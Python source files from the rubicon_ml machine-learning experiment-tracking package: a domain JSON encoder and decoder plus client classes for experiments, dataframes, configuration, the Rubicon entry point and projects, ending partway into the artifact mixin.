return {"_type": "date", "value": obj.isoformat()}
elif isinstance(obj, set):
return {"_type": "set", "value": list(obj)}
elif isinstance(obj, TrainingMetadata):
return {"_type": "training_metadata", "value": obj.training_metadata}
elif isinstance(obj, (np.generic, np.ndarray)):
return {
"_type": "numpy",
"_dtype": np.lib.format.dtype_to_descr(obj.dtype),
"_shape": obj.shape,
"value": b64encode(obj.tobytes()).decode(),
}
elif dataclasses.is_dataclass(obj):
return obj.__dict__
else:
return super().default(obj) # pragma: no cover
class DomainJSONDecoder(json.JSONDecoder):
def __init__(self, *args, **kwargs):
json.JSONDecoder.__init__(self, object_hook=self.object_hook, *args, **kwargs)
def object_hook(self, obj):
if obj.get("_type") == "datetime":
return datetime.strptime(obj.get("value"), "%Y-%m-%d %H:%M:%S.%f")
elif obj.get("_type") == "date":
return date.fromisoformat(obj.get("value"))
elif obj.get("_type") == "set":
return set(obj.get("value"))
elif obj.get("_type") == "training_metadata":
return TrainingMetadata([(*o,) for o in obj.get("value")])
elif obj.get("_type") == "numpy":
dtype = np.lib.format.descr_to_dtype(obj.get("_dtype"))
shape = obj.get("_shape")
value = np.frombuffer(b64decode(obj.get("value")), dtype)
return value.reshape(shape) if shape else value[0]
else:
return obj
def dump(data, open_file, **kwargs):
return json.dump(data, open_file, cls=DomainJSONEncoder, **kwargs)
def dumps(data, **kwargs):
return json.dumps(data, cls=DomainJSONEncoder, **kwargs)
def load(open_file, **kwargs):
return json.load(open_file, cls=DomainJSONDecoder, **kwargs)
def loads(data, **kwargs):
return json.loads(data, cls=DomainJSONDecoder, **kwargs) | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/repository/utils/json.py | 0.511473 | 0.178043 | json.py | pypi |
from rubicon_ml import domain
from rubicon_ml.client import (
ArtifactMixin,
Base,
DataframeMixin,
Feature,
Metric,
Parameter,
TagMixin,
)
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.client.utils.tags import filter_children
from rubicon_ml.exceptions import RubiconException
class Experiment(Base, ArtifactMixin, DataframeMixin, TagMixin):
"""A client experiment.
An `experiment` represents a model run and is identified by
its 'created_at' time. It can have `metrics`, `parameters`,
`features`, `dataframes`, and `artifacts` logged to it.
An `experiment` is logged to a `project`.
Parameters
----------
domain : rubicon.domain.Experiment
The experiment domain model.
parent : rubicon.client.Project
The project that the experiment is logged to.
"""
def __init__(self, domain, parent):
super().__init__(domain, parent._config)
self._parent = parent
self._artifacts = []
self._dataframes = []
self._metrics = []
self._features = []
self._parameters = []
def _get_identifiers(self):
"""Get the experiment's project's name and the experiment's ID."""
return self.project.name, self.id
@failsafe
def log_metric(self, name, value, directionality="score", description=None, tags=[]):
"""Create a metric under the experiment.
Parameters
----------
name : str
The metric's name.
value : float
The metric's value.
directionality : str, optional
The metric's directionality. Must be one of
["score", "loss"], where "score" represents
a metric to maximize, while "loss" represents a
metric to minimize. Defaults to "score".
description : str, optional
The metric's description. Use to provide additional
context.
tags : list of str, optional
Values to tag the experiment with. Use tags to organize and
filter your metrics.
Returns
-------
rubicon.client.Metric
The created metric.
"""
if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
raise ValueError("`tags` must be `list` of type `str`")
metric = domain.Metric(
name, value, directionality=directionality, description=description, tags=tags
)
for repo in self.repositories:
repo.create_metric(metric, self.project.name, self.id)
return Metric(metric, self)
@failsafe
def metrics(self, name=None, tags=[], qtype="or"):
"""Get the metrics logged to this experiment.
Parameters
----------
name : str, optional
The name value to filter results on.
tags : list of str, optional
The tag values to filter results on.
qtype : str, optional
The query type to filter results on. Can be 'or' or
'and'. Defaults to 'or'.
Returns
-------
list of rubicon.client.Metric
The metrics previously logged to this experiment.
"""
return_err = None
for repo in self.repositories:
try:
metrics = [Metric(m, self) for m in repo.get_metrics(self.project.name, self.id)]
except Exception as err:
return_err = err
else:
self._metrics = filter_children(metrics, tags, qtype, name)
return self._metrics
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def metric(self, name=None, id=None):
"""Get a metric.
Parameters
----------
name : str, optional
The name of the metric to get.
id : str, optional
The id of the metric to get.
Returns
-------
rubicon.client.Metric
The metric with name `name` or id `id`.
"""
if (name is None and id is None) or (name is not None and id is not None):
raise ValueError("`name` OR `id` required.")
if name is not None:
return_err = None
for repo in self.repositories:
try:
metric = repo.get_metric(self.project.name, self.id, name)
except Exception as err:
return_err = err
else:
metric = Metric(metric, self)
return metric
raise RubiconException("all configured storage backends failed") from return_err
else:
metric = [m for m in self.metrics() if m.id == id][0]
return metric
@failsafe
def log_feature(self, name, description=None, importance=None, tags=[]):
"""Create a feature under the experiment.
Parameters
----------
name : str
The features's name.
description : str
The feature's description. Use to provide
additional context.
importance : float
The feature's importance.
tags : list of str, optional
Values to tag the experiment with. Use tags to organize and
filter your features.
Returns
-------
rubicon.client.Feature
The created feature.
"""
if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
raise ValueError("`tags` must be `list` of type `str`")
feature = domain.Feature(name, description=description, importance=importance, tags=tags)
for repo in self.repositories:
repo.create_feature(feature, self.project.name, self.id)
return Feature(feature, self)
@failsafe
def features(self, name=None, tags=[], qtype="or"):
"""Get the features logged to this experiment.
Parameters
----------
name : str, optional
The name value to filter results on.
tags : list of str, optional
The tag values to filter results on.
qtype : str, optional
The query type to filter results on. Can be 'or' or
'and'. Defaults to 'or'.
Returns
-------
list of rubicon.client.Feature
The features previously logged to this experiment.
"""
return_err = None
for repo in self.repositories:
try:
features = [Feature(f, self) for f in repo.get_features(self.project.name, self.id)]
except Exception as err:
return_err = err
else:
self._features = filter_children(features, tags, qtype, name)
return self._features
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def feature(self, name=None, id=None):
"""Get a feature.
Parameters
----------
name : str, optional
The name of the feature to get.
id : str, optional
The id of the feature to get.
Returns
-------
rubicon.client.Feature
The feature with name `name` or id `id`.
"""
if (name is None and id is None) or (name is not None and id is not None):
raise ValueError("`name` OR `id` required.")
if name is not None:
return_err = None
for repo in self.repositories:
try:
feature = repo.get_feature(self.project.name, self.id, name)
except Exception as err:
return_err = err
else:
feature = Feature(feature, self)
return feature
raise RubiconException("all configured storage backends failed") from return_err
else:
feature = [f for f in self.features() if f.id == id][0]
return feature
@failsafe
def log_parameter(self, name, value=None, description=None, tags=[]):
"""Create a parameter under the experiment.
Parameters
----------
name : str
The parameter's name.
value : object, optional
The parameter's value. Can be an object of any JSON
serializable (via rubicon.utils.DomainJSONEncoder)
type.
description : str, optional
The parameter's description. Use to provide
additional context.
tags : list of str, optional
Values to tag the parameter with. Use tags to organize and
filter your parameters.
Returns
-------
rubicon.client.Parameter
The created parameter.
"""
if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
raise ValueError("`tags` must be `list` of type `str`")
parameter = domain.Parameter(name, value=value, description=description, tags=tags)
for repo in self.repositories:
repo.create_parameter(parameter, self.project.name, self.id)
return Parameter(parameter, self)
@failsafe
def parameters(self, name=None, tags=[], qtype="or"):
"""Get the parameters logged to this experiment.
Parameters
----------
name : str, optional
The name value to filter results on.
tags : list of str, optional
The tag values to filter results on.
qtype : str, optional
The query type to filter results on. Can be 'or' or
'and'. Defaults to 'or'.
Returns
-------
list of rubicon.client.Parameter
The parameters previously logged to this experiment.
"""
return_err = None
for repo in self.repositories:
try:
parameters = [
Parameter(p, self) for p in repo.get_parameters(self.project.name, self.id)
]
except Exception as err:
return_err = err
else:
self._parameters = filter_children(parameters, tags, qtype, name)
return self._parameters
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def parameter(self, name=None, id=None):
"""Get a parameter.
Parameters
----------
name : str, optional
The name of the parameter to get.
id : str, optional
The id of the parameter to get.
Returns
-------
rubicon.client.Parameter
The parameter with name `name` or id `id`.
"""
if (name is None and id is None) or (name is not None and id is not None):
raise ValueError("`name` OR `id` required.")
if name is not None:
return_err = None
for repo in self.repositories:
try:
parameter = repo.get_parameter(self.project.name, self.id, name)
except Exception as err:
return_err = err
else:
parameter = Parameter(parameter, self)
return parameter
raise RubiconException("all configured storage backends failed") from return_err
else:
parameter = [p for p in self.parameters() if p.id == id][0]
return parameter
@property
def id(self):
"""Get the experiment's id."""
return self._domain.id
@property
def name(self):
"""Get the experiment's name."""
return self._domain.name
@property
def description(self):
"""Get the experiment's description."""
return self._domain.description
@property
def model_name(self):
"""Get the experiment's model name."""
return self._domain.model_name
@property
def branch_name(self):
"""Get the experiment's branch name."""
return self._domain.branch_name
@property
def commit_hash(self):
"""Get the experiment's commit hash."""
return self._domain.commit_hash
@property
def training_metadata(self):
"""Get the project's training metadata."""
training_metadata = self._domain.training_metadata.training_metadata
if len(training_metadata) == 1:
training_metadata = training_metadata[0]
return training_metadata
@property
def created_at(self):
"""Get the time the experiment was created."""
return self._domain.created_at
@property
def project(self):
"""Get the project client object that this experiment
belongs to.
"""
return self._parent | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/client/experiment.py | 0.942361 | 0.256169 | experiment.py | pypi |
from rubicon_ml.client import Base, TagMixin
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.exceptions import RubiconException
class Dataframe(Base, TagMixin):
"""A client dataframe.
A `dataframe` is a two-dimensional, tabular dataset with
labeled axes (rows and columns) that provides value to the
model developer and/or reviewer when visualized.
For example, confusion matrices, feature importance tables
and marginal residuals can all be logged as a `dataframe`.
A `dataframe` is logged to a `project` or an `experiment`.
Parameters
----------
domain : rubicon.domain.Dataframe
The dataframe domain model.
parent : rubicon.client.Project or rubicon.client.Experiment
The project or experiment that the artifact is
logged to.
"""
def __init__(self, domain, parent):
super().__init__(domain, parent._config)
self._data = None
self._parent = parent
@failsafe
def get_data(self, df_type="pandas"):
"""Loads the data associated with this Dataframe
into a `pandas` or `dask` dataframe.
Parameters
----------
df_type : str, optional
The type of dataframe to return. Valid options include
["dask", "pandas"]. Defaults to "pandas".
"""
project_name, experiment_id = self.parent._get_identifiers()
return_err = None
for repo in self.repositories:
try:
self._data = repo.get_dataframe_data(
project_name,
self.id,
experiment_id=experiment_id,
df_type=df_type,
)
except Exception as err:
return_err = err
else:
return self._data
raise RubiconException(return_err)
@failsafe
def plot(self, df_type="pandas", plotting_func=None, **kwargs):
"""Render the dataframe using `plotly.express`.
Parameters
----------
df_type : str, optional
The type of dataframe. Can be either `pandas` or `dask`.
Defaults to 'pandas'.
plotting_func : function, optional
The `plotly.express` plotting function used to visualize the
dataframes. Available options can be found at
https://plotly.com/python-api-reference/plotly.express.html.
Defaults to `plotly.express.line`.
kwargs : dict, optional
Keyword arguments to be passed to `plotting_func`. Available options
can be found in the documentation of the individual functions at the
URL above.
Examples
--------
>>> # Log a line plot
>>> dataframe.plot(x='Year', y='Number of Subscriptions')
>>> # Log a bar plot
>>> import plotly.express as px
>>> dataframe.plot(plotting_func=px.bar, x='Year', y='Number of Subscriptions')
"""
try:
import plotly.express as px
if plotting_func is None:
plotting_func = px.line
except ImportError:
raise RubiconException(
"`ui` extras are required for plotting. Install with `pip install rubicon-ml[ui]`."
)
return plotting_func(self.get_data(df_type=df_type), **kwargs)
@property
def id(self):
"""Get the dataframe's id."""
return self._domain.id
@property
def name(self):
"""Get the dataframe's name."""
return self._domain.name
@property
def description(self):
"""Get the dataframe's description."""
return self._domain.description
@property
def created_at(self):
"""Get the time this dataframe was created."""
return self._domain.created_at
@property
def parent(self):
"""Get the dataframe's parent client object."""
return self._parent | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/client/dataframe.py | 0.936916 | 0.512998 | dataframe.py | pypi |
import os
import subprocess
from rubicon_ml.exceptions import RubiconException
from rubicon_ml.repository import LocalRepository, MemoryRepository, S3Repository
class Config:
"""Used to configure `rubicon` client objects.
Configuration can be specified (in order of precedence) by:
1. environment variables 'PERSISTENCE' and 'ROOT_DIR'
2. arguments to `__init__`
Parameters
----------
persistence : str, optional
The persistence type. Can be one of ["filesystem", "memory"].
root_dir : str, optional
Absolute or relative filepath. Defaults to using the local
filesystem. Prefix with s3:// to use s3 instead.
auto_git_enabled : bool, optional
True to use the `git` command to automatically log relevant repository
information to projects and experiments logged with this client instance,
False otherwise. Defaults to False.
storage_options : dict, optional
Additional keyword arguments specific to the protocol being chosen. They
are passed directly to the underlying filesystem class.
"""
PERSISTENCE_TYPES = ["filesystem", "memory"]
REPOSITORIES = {
"memory-memory": MemoryRepository,
"filesystem-local": LocalRepository,
"filesystem-s3": S3Repository,
}
def __init__(
self, persistence=None, root_dir=None, is_auto_git_enabled=False, **storage_options
):
self.storage_options = storage_options
if storage_options is not None and "composite_config" in storage_options:
composite_config = storage_options.get("composite_config")
repositories = []
for config in composite_config:
self.persistence, self.root_dir, self.is_auto_git_enabled = self._load_config(
config["persistence"], config["root_dir"], is_auto_git_enabled
)
repositories.append(self._get_repository())
self.repositories = repositories
else:
self.persistence, self.root_dir, self.is_auto_git_enabled = self._load_config(
persistence, root_dir, is_auto_git_enabled
)
self.repository = self._get_repository()
def _check_is_in_git_repo(self):
"""Raise a `RubiconException` if not called from within a `git` repository."""
if subprocess.run(["git", "rev-parse", "--git-dir"], capture_output=True).returncode != 0:
raise RubiconException(
"Not a `git` repo: Falied to locate the '.git' directory in this or any parent directories."
)
def _load_config(self, persistence, root_dir, is_auto_git_enabled):
"""Get the configuration values."""
persistence = os.environ.get("PERSISTENCE", persistence)
if persistence not in self.PERSISTENCE_TYPES:
raise ValueError(f"PERSISTENCE must be one of {self.PERSISTENCE_TYPES}.")
root_dir = os.environ.get("ROOT_DIR", root_dir)
if root_dir is None and persistence == "filesystem":
raise ValueError("root_dir cannot be None.")
if is_auto_git_enabled:
self._check_is_in_git_repo()
return (persistence, root_dir, is_auto_git_enabled)
def _get_protocol(self):
"""Get the file protocol of the configured root directory."""
if self.persistence == "memory":
return "memory"
elif self.persistence == "filesystem":
if self.root_dir.startswith("s3://"):
return "s3"
else:
return "local"
return "custom" # catch-all for external backends
def _get_repository(self):
"""Get the repository for the configured persistence type."""
protocol = self._get_protocol()
repository_key = f"{self.persistence}-{protocol}"
repository = self.REPOSITORIES.get(repository_key)
if repository is None:
raise RubiconException(
f"{self.__class__.__module__}.{self.__class__.__name__} has no persistence "
+ f"layer for the provided configuration: `persistence`: {self.persistence}, "
+ f"`protocol` (from `root_dir`): {protocol}"
)
return repository(root_dir=self.root_dir, **self.storage_options) | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/client/config.py | 0.844697 | 0.193528 | config.py | pypi |
import subprocess
import warnings
from rubicon_ml import domain
from rubicon_ml.client import Config, Project
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.exceptions import RubiconException
from rubicon_ml.repository.utils import slugify
class Rubicon:
"""The `rubicon` client's entry point.
Creates a `Config` and injects it into the client level
objects at run-time.
Parameters
----------
persistence : str, optional
The persistence type. Can be one of ["filesystem", "memory"].
Defaults to "filesystem".
root_dir : str, optional
Absolute or relative filepath. Use absolute path for best performance.
Defaults to the local filesystem. Prefix with s3:// to use s3 instead.
auto_git_enabled : bool, optional
True to use the `git` command to automatically log relevant repository
information to projects and experiments logged with this client instance,
False otherwise. Defaults to False.
storage_options : dict, optional
Additional keyword arguments specific to the protocol being chosen. They
are passed directly to the underlying filesystem class.
"""
def __init__(
self, persistence="filesystem", root_dir=None, auto_git_enabled=False, **storage_options
):
self.config = Config(persistence, root_dir, auto_git_enabled, **storage_options)
@property
def repository(self):
return self.config.repository
@property
def repositories(self):
if hasattr(self.config, "repositories"):
return self.config.repositories
else:
return [self.config.repository]
@repository.setter
def repository(self, value):
self.config.repository = value
def _get_github_url(self):
"""Returns the repository URL of the `git` repo it is called from."""
completed_process = subprocess.run(["git", "remote", "-v"], capture_output=True)
remotes = completed_process.stdout.decode("utf8").replace("\t", " ").split("\n")
try:
origin = [remote for remote in remotes if remote.startswith("origin")][0]
github_url = origin.split(" ")[1]
except IndexError:
github_url = None
return github_url
def _create_project_domain(self, name, description, github_url, training_metadata):
"""Instantiates and returns a project domain object."""
if self.config.is_auto_git_enabled and github_url is None:
github_url = self._get_github_url()
if training_metadata is not None:
training_metadata = domain.utils.TrainingMetadata(training_metadata)
return domain.Project(
name,
description=description,
github_url=github_url,
training_metadata=training_metadata,
)
@failsafe
def create_project(self, name, description=None, github_url=None, training_metadata=None):
"""Create a project.
Parameters
----------
name : str
The project's name.
description : str, optional
The project's description.
github_url : str, optional
The URL of the GitHub repository associated with this
project. If omitted and automatic `git` logging is
enabled, it will be retrieved via `git remote`.
training_metadata : tuple or list of tuples, optional
Metadata associated with the training dataset(s)
used across each experiment in this project.
Returns
-------
rubicon.client.Project
The created project.
"""
project = self._create_project_domain(name, description, github_url, training_metadata)
for repo in self.repositories:
repo.create_project(project)
return Project(project, self.config)
@failsafe
def get_project(self, name=None, id=None):
"""Get a project.
Parameters
----------
name : str, optional
The name of the project to get.
id : str, optional
The id of the project to get.
Returns
-------
rubicon.client.Project
The project with name `name` or id `id`.
"""
if (name is None and id is None) or (name is not None and id is not None):
raise ValueError("`name` OR `id` required.")
if name is not None:
return_err = None
for repo in self.repositories:
try:
project = repo.get_project(name)
except Exception as err:
return_err = err
else:
project = Project(project, self.config)
return project
raise RubiconException("all configured storage backends failed") from return_err
else:
project = [p for p in self.projects() if p.id == id][0]
return project
def get_project_as_dask_df(self, name, group_by=None):
"""DEPRECATED: Available for backwards compatibility."""
warnings.warn(
"`get_project_as_dask_df` is deprecated and will be removed in a future "
"release. use `get_project_as_df('name', df_type='dask') instead.",
DeprecationWarning,
)
return self.get_project_as_df(name, df_type="dask", group_by=group_by)
@failsafe
def get_project_as_df(self, name, df_type="pandas", group_by=None):
"""Get a dask or pandas dataframe representation of a project.
Parameters
----------
name : str
The name of the project to get.
df_type : str, optional
The type of dataframe to return. Valid options include
["dask", "pandas"]. Defaults to "pandas".
group_by : str or None, optional
How to group the project's experiments in the returned
DataFrame(s). Valid options include ["commit_hash"].
Returns
-------
pandas.DataFrame or list of pandas.DataFrame or dask.DataFrame or list of dask.DataFrame
If `group_by` is `None`, a dask or pandas dataframe holding the project's
data. Otherwise a list of dask or pandas dataframes holding the project's
data grouped by `group_by`.
"""
project = self.get_project(name)
return project.to_df(df_type=df_type, group_by=None)
@failsafe
def get_or_create_project(self, name, **kwargs):
"""Get or create a project.
Parameters
----------
name : str
The project's name.
kwargs : dict
Additional keyword arguments to be passed to
`Rubicon.create_project`.
Returns
-------
rubicon.client.Project
The corresponding project.
"""
try:
project = self.get_project(name)
except RubiconException:
project = self.create_project(name, **kwargs)
else: # check for None in case of failure mode being set to "log" or "warn"
if project is None:
project = self.create_project(name, **kwargs)
return project
@failsafe
def projects(self):
"""Get a list of available projects.
Returns
-------
list of rubicon.client.Project
The list of available projects.
"""
return_err = None
for repo in self.repositories:
try:
projects = [Project(project, self.config) for project in repo.get_projects()]
except Exception as err:
return_err = err
else:
return projects
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def sync(self, project_name, s3_root_dir):
"""Sync a local project to S3.
Parameters
----------
project_name : str
The name of the project to sync.
s3_root_dir : str
The S3 path where the project's data
will be synced.
Notes
-----
Use to backup your local project data to S3, as an alternative to direct S3 logging.
Relies on AWS CLI's sync. Ensure that your credentials are set and that your Proxy
is on.
"""
if self.config.persistence != "filesystem":
raise RubiconException(
"You can't sync projects written to memory. Sync from either local filesystem or S3."
)
project = self.get_project(project_name)
local_path = f"{self.config.root_dir}/{slugify(project.name)}"
cmd = f"aws s3 sync {local_path} {s3_root_dir}/{slugify(project.name)}"
try:
subprocess.run(cmd, shell=True, check=True, capture_output=True)
except subprocess.CalledProcessError as e:
raise RubiconException(e.stderr) | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/client/rubicon.py | 0.874104 | 0.224459 | rubicon.py | pypi |
import subprocess
import warnings
from typing import List, Optional
import dask.dataframe as dd
import pandas as pd
from rubicon_ml import domain
from rubicon_ml.client import ArtifactMixin, Base, DataframeMixin, Experiment
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.client.utils.tags import filter_children
from rubicon_ml.exceptions import RubiconException
class Project(Base, ArtifactMixin, DataframeMixin):
"""A client project.
A `project` is a collection of `experiments`,
`dataframes`, and `artifacts` identified by a unique name.
Parameters
----------
domain : rubicon.domain.Project
The project domain model.
config : rubicon.client.Config
The config, which specifies the underlying repository.
"""
def __init__(self, domain, config=None):
super().__init__(domain, config)
self._artifacts = []
self._dataframes = []
self._experiments = []
def _get_branch_name(self):
"""Returns the name of the active branch of the `git` repo
it is called from.
"""
command = ["git", "rev-parse", "--abbrev-ref", "HEAD"]
completed_process = subprocess.run(command, capture_output=True)
return completed_process.stdout.decode("utf8").replace("\n", "")
def _get_commit_hash(self):
"""Returns the hash of the last commit to the active branch
of the `git` repo it is called from.
"""
command = ["git", "rev-parse", "HEAD"]
completed_process = subprocess.run(command, capture_output=True)
return completed_process.stdout.decode("utf8").replace("\n", "")
def _get_identifiers(self):
"""Get the project's name."""
return self.name, None
def _create_experiment_domain(
self,
name,
description,
model_name,
branch_name,
commit_hash,
training_metadata,
tags,
):
"""Instantiates and returns an experiment domain object."""
if self._config.is_auto_git_enabled:
if branch_name is None:
branch_name = self._get_branch_name()
if commit_hash is None:
commit_hash = self._get_commit_hash()
if training_metadata is not None:
training_metadata = domain.utils.TrainingMetadata(training_metadata)
return domain.Experiment(
project_name=self._domain.name,
name=name,
description=description,
model_name=model_name,
branch_name=branch_name,
commit_hash=commit_hash,
training_metadata=training_metadata,
tags=tags,
)
def _group_experiments(self, experiments, group_by=None):
"""Groups experiments by `group_by`. Valid options include ["commit_hash"].
Returns
-------
dict
A dictionary of (group name, DataFrame) key-value pairs.
"""
GROUP_BY_OPTIONS = ["commit_hash"]
if group_by is not None and group_by not in GROUP_BY_OPTIONS:
raise ValueError(f"`group_by` must be one of {GROUP_BY_OPTIONS} or `None`.")
if group_by is not None:
grouped_experiments = {}
if group_by == "commit_hash":
for experiment in experiments:
current_experiments = grouped_experiments.get(experiment.commit_hash, [])
current_experiments.append(experiment)
grouped_experiments[experiment.commit_hash] = current_experiments
else:
grouped_experiments = {None: experiments}
return grouped_experiments
def to_dask_df(self, group_by=None):
"""DEPRECATED: Available for backwards compatibility."""
warnings.warn(
"`to_dask_df` is deprecated and will be removed in a future release. "
"use `to_df(df_type='dask') instead.",
DeprecationWarning,
)
return self.to_df(df_type="dask", group_by=group_by)
@failsafe
def to_df(self, df_type="pandas", group_by=None):
"""Loads the project's data into dask or pandas dataframe(s) sorted by
`created_at`. This includes the experiment details along with parameters
and metrics.
Parameters
----------
df_type : str, optional
The type of dataframe to return. Valid options include
["dask", "pandas"]. Defaults to "pandas".
group_by : str or None, optional
How to group the project's experiments in the returned
dataframe(s). Valid options include ["commit_hash"].
Returns
-------
pandas.DataFrame or list of pandas.DataFrame or dask.DataFrame or list of dask.DataFrame
If `group_by` is `None`, a dask or pandas dataframe holding the project's
data. Otherwise a list of dask or pandas dataframes holding the project's
data grouped by `group_by`.
"""
DEFAULT_COLUMNS = [
"id",
"name",
"description",
"model_name",
"commit_hash",
"tags",
"created_at",
]
experiments = self.experiments()
grouped_experiments = self._group_experiments(experiments, group_by=group_by)
experiment_dfs = {}
for group, experiments in grouped_experiments.items():
experiment_records = []
parameter_names = set()
metric_names = set()
for experiment in experiments:
experiment_record = {
"id": experiment.id,
"name": experiment.name,
"description": experiment.description,
"model_name": experiment.model_name,
"commit_hash": experiment.commit_hash,
"tags": experiment.tags,
"created_at": experiment.created_at,
}
for parameter in experiment.parameters():
experiment_record[f"{parameter.name}"] = parameter.value
parameter_names.add(parameter.name)
for metric in experiment.metrics():
experiment_record[f"{metric.name}"] = metric.value
metric_names.add(metric.name)
# TODO - features, artifacts, dataframes represented here?
experiment_records.append(experiment_record)
columns = DEFAULT_COLUMNS + list(parameter_names) + list(metric_names)
df = pd.DataFrame.from_records(experiment_records, columns=columns)
df = df.sort_values(by=["created_at"], ascending=False).reset_index(drop=True)
if df_type == "dask":
df = dd.from_pandas(df, npartitions=1)
experiment_dfs[group] = df
return experiment_dfs if group_by is not None else list(experiment_dfs.values())[0]
@failsafe
def log_experiment(
self,
name=None,
description=None,
model_name=None,
branch_name=None,
commit_hash=None,
training_metadata=None,
tags=[],
):
"""Log a new experiment to this project.
Parameters
----------
name : str
The experiment's name.
description : str, optional
The experiment's description. Use to provide
additional context.
model_name : str, optional
The experiment's model name. For example, this
could be the name of the registered model in Model One.
branch_name : str, optional
The name of the active branch of the `git` repo this experiment
is logged from. If omitted and automatic `git` logging is enabled,
it will be retrieved via `git rev-parse`.
commit_hash : str, optional
The hash of the last commit to the active branch of the `git` repo
this experiment is logged from. If omitted and automatic `git`
logging is enabled, it will be retrieved via `git rev-parse`.
training_metadata : tuple or list of tuples, optional
Metadata associated with the experiment's
training dataset(s).
tags : list of str, optional
Values to tag the experiment with. Use tags to organize and
filter your experiments. For example, tags could be used
to differentiate between the type of model or classifier
used during the experiment (i.e. `linear regression`
or `random forest`).
Returns
-------
rubicon.client.Experiment
The created experiment.
"""
if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
raise ValueError("`tags` must be `list` of type `str`")
experiment = self._create_experiment_domain(
name,
description,
model_name,
branch_name,
commit_hash,
training_metadata,
tags,
)
for repo in self.repositories:
repo.create_experiment(experiment)
return Experiment(experiment, self)
@failsafe
def experiment(self, id=None, name=None):
"""Get an experiment logged to this project by id or name.
Parameters
----------
id : str
The id of the experiment to get.
name : str
The name of the experiment to get.
Returns
-------
rubicon.client.Experiment
The experiment logged to this project with id `id` or name 'name'.
"""
if (name is None and id is None) or (name is not None and id is not None):
raise ValueError("`name` OR `id` required.")
if name is not None:
experiments = [e for e in self.experiments() if e.name == name]
if len(experiments) == 0:
raise RubiconException(f"No experiment found with name '{name}'.")
elif len(experiments) > 1:
warnings.warn(
f"Multiple experiments found with name '{name}'."
" Returning most recently logged."
)
experiment = experiments[-1]
return experiment
else:
return_err = None
for repo in self.repositories:
try:
experiment = Experiment(repo.get_experiment(self.name, id), self)
except Exception as err:
return_err = err
else:
return experiment
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def experiments(self, tags=[], qtype="or", name=None):
"""Get the experiments logged to this project.
Parameters
----------
tags : list of str, optional
The tag values to filter results on.
qtype : str, optional
The query type to filter results on. Can be 'or' or
'and'. Defaults to 'or'.
name:
The name of the experiment(s) to filter results on.
Returns
-------
list of rubicon.client.Experiment
The experiments previously logged to this project.
"""
return_err = None
for repo in self.repositories:
try:
experiments = [Experiment(e, self) for e in repo.get_experiments(self.name)]
except Exception as err:
return_err = err
else:
self._experiments = filter_children(experiments, tags, qtype, name)
return self._experiments
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def dataframes(self, tags=[], qtype="or", recursive=False, name=None):
"""Get the dataframes logged to this project.
Parameters
----------
tags : list of str, optional
The tag values to filter results on.
qtype : str, optional
The query type to filter results on. Can be 'or' or
'and'. Defaults to 'or'.
recursive : bool, optional
If true, get the dataframes logged to this project's
experiments as well. Defaults to false.
name : str
The name value to filter results on.
Returns
-------
list of rubicon.client.Dataframe
The dataframes previously logged to this client object.
"""
super().dataframes(tags=tags, qtype=qtype, name=name)
if recursive is True:
for experiment in self.experiments():
self._dataframes.extend(experiment.dataframes(tags=tags, qtype=qtype, name=name))
return self._dataframes
@failsafe
def archive(self, experiments: Optional[List[Experiment]] = None, remote_rubicon=None):
"""Archive the experiments logged to this project.
Parameters
----------
experiments : list of Experiments, optional
The rubicon.client.Experiment objects to archive. If None all logged experiments are archived.
remote_rubicon : rubicon_ml.Rubicon object, optional
The remote Rubicon object with the repository to archive to
Returns
-------
filepath of newly created archive
"""
if len(self.experiments()) == 0:
raise ValueError("`project` has no logged `experiments` to archive")
if experiments is not None:
if not isinstance(experiments, list) or not all(
[isinstance(experiment, Experiment) for experiment in experiments]
):
raise ValueError(
"`experiments` must be `list` of type `rubicon_ml.client.Experiment`"
)
if remote_rubicon is not None:
from rubicon_ml import Rubicon
if not isinstance(remote_rubicon, Rubicon):
raise ValueError("`remote_rubicon` must be of type `rubicon_ml.client.Rubicon`")
else:
return self.repository._archive(
self.name, experiments, remote_rubicon.repository.root_dir
)
else:
return self.repository._archive(self.name, experiments, None)
@failsafe
def experiments_from_archive(self, remote_rubicon, latest_only: Optional[bool] = False):
"""Retrieve archived experiments into this project's experiments folder.
Parameters
----------
remote_rubicon : rubicon_ml.Rubicon object
The remote Rubicon object with the repository containing archived experiments to read in
latest_only : bool, optional
Indicates whether or not experiments should only be read from the latest archive
"""
from rubicon_ml import Rubicon
if not isinstance(remote_rubicon, Rubicon):
raise ValueError("`remote_rubicon` must be of type `rubicon_ml.client.Rubicon`")
self.repository._experiments_from_archive(
self.name, remote_rubicon.repository.root_dir, latest_only
)
@property
def name(self):
"""Get the project's name."""
return self._domain.name
@property
def id(self):
"""Get the project's id."""
return self._domain.id
@property
def description(self):
"""Get the project's description."""
return self._domain.description
@property
def github_url(self):
"""Get the project's GitHub repository URL."""
return self._domain.github_url
@property
def training_metadata(self):
"""Get the project's training metadata."""
training_metadata = self._domain.training_metadata.training_metadata
if len(training_metadata) == 1:
training_metadata = training_metadata[0]
return training_metadata
@property
def created_at(self):
"""Get the time the project was created."""
return self._domain.created_at | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/client/project.py | 0.879471 | 0.220154 | project.py | pypi |
import os
import pickle
import subprocess
import warnings
from datetime import datetime
import fsspec
from rubicon_ml import client, domain
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.client.utils.tags import filter_children
from rubicon_ml.exceptions import RubiconException
class ArtifactMixin:
"""Adds artifact support to a client object."""
def _validate_data(self, data_bytes, data_file, data_object, data_path, name):
